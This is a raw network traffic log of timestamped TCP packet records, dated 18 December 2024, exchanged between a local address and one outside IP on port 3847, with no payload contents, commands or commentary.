                                                                                                                                                Dec 18, 2024 19:27:21.482287884 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:21.483308077 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.483436108 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.483534098 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:21.484524012 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.484654903 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.485455990 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:21.485652924 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.485817909 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.485883951 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:21.486824036 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.486846924 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.487091064 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:21.487925053 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.488017082 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.488452911 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:21.489126921 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.489270926 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.489449978 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:21.490278006 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.490576982 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.490617990 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:21.491801023 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.491817951 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.491858006 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:21.492757082 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.492866993 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.492902040 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:21.494993925 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.495105028 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.495137930 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.495177984 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:21.495647907 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.496032000 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.496099949 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:21.496136904 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.496351957 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:21.497180939 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.550487041 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:21.628550053 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.628698111 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.628758907 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:21.629093885 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.629323006 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.629384995 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:21.630254984 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.630686998 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.630754948 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:21.630775928 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.631828070 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.631918907 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.631987095 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:21.633054972 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.633112907 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:21.633163929 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.634186029 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.634285927 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:21.634304047 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.635303020 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.635359049 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:21.635489941 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.636532068 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.636600018 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.636653900 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:21.637860060 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.637958050 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.638093948 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:21.638762951 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.638817072 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:21.638860941 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.639919043 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.640094995 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.640116930 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:21.641057968 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.641117096 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:21.641200066 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.642298937 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.642354012 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.642410040 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:21.643454075 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.643487930 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.643537998 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:21.644694090 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.644807100 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.644818068 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:21.645827055 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.645860910 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.645889997 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:21.646956921 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.646991014 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.647032976 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:21.648121119 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.648156881 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.648163080 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:21.649446964 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.649483919 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.649529934 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:21.650367975 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.650403023 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.650536060 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:21.651532888 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.651568890 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.651612043 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:21.652667046 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.652734041 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.652785063 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:21.653851032 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.653906107 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.655019045 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.655061960 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.655081034 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:21.656250954 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.656307936 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:21.656419039 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.657449961 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.657486916 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.657538891 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:21.658623934 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.658672094 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.658673048 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:21.659634113 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.659687996 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:21.659749031 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.660958052 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.660993099 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.661115885 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:21.662039995 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.662074089 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.662091970 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:21.663178921 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.663233995 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:21.663239002 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.664236069 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.664280891 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.664284945 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:21.665394068 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.665435076 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:21.665465117 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.666557074 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.666598082 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:21.666620016 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.667680025 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.667723894 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:21.667763948 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.668922901 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.668965101 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.669013977 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:21.670046091 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.670094013 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:21.670133114 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.671363115 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.671428919 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.671477079 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:21.672355890 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.672406912 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:21.672507048 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.673444986 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.673651934 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.673706055 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:21.674624920 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.674675941 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:21.674722910 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.675770044 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.675921917 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.675971031 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:21.676934004 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.676973104 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.676980019 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:21.678107977 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.678153038 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:21.678231001 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.679209948 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.679306984 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.679445028 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:21.680495977 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.680542946 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.681565046 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.681612015 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:21.681631088 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.683098078 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.683146954 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:21.683235884 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.683919907 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.683967113 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:21.684042931 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.685035944 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.685080051 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:21.685154915 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.686152935 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.686192036 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:21.686222076 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.687331915 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.687359095 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.687403917 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:21.688504934 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.688612938 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:21.688637018 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.737988949 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:21.820975065 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.821042061 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.821281910 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:21.821392059 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.821506023 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.823461056 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:21.826031923 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.826070070 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.826105118 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.826185942 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.826230049 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:21.826354027 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.826389074 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.827595949 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.827631950 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.827644110 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:21.827671051 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:21.828598022 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.828753948 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.828923941 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:21.829927921 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.830059052 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.830104113 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:21.830862045 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.831049919 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.831088066 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:21.832149029 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.832293034 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.832453012 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:21.833214045 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.833555937 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.833832026 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:21.834420919 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.834582090 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.834770918 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:21.835688114 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.835741997 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.835784912 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:21.836739063 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.836879969 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.837131023 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:21.837994099 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.838133097 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.838212013 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:21.839185953 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.839221001 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.839468002 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:21.840327978 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.840487003 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.840898991 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:21.841404915 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.841443062 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.842596054 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.842632055 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.842643023 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:21.842674017 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:21.843669891 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.843704939 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.843909979 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:21.844918013 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.844953060 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.844997883 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:21.845971107 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.846087933 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.846123934 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:21.847284079 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.847393036 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.847453117 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:21.848459959 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.848649979 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.848858118 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:21.849600077 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.849845886 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.850028038 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:21.850811005 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.850909948 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.851041079 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:21.851783991 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.851860046 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.852085114 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:21.853010893 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.853127003 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.853450060 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:21.854235888 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.854299068 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.854356050 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:21.855330944 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.855417967 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.855477095 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:21.856486082 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.856538057 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.857131958 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:21.857652903 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.857724905 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.857774973 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:21.858916044 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.858962059 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.859289885 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:21.860157967 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.860194921 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.860244036 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:21.861090899 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.861124039 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.861283064 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:21.862188101 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.862322092 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.862397909 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:21.863358021 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.863380909 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.863419056 CET38474984087.120.127.215192.168.2.4
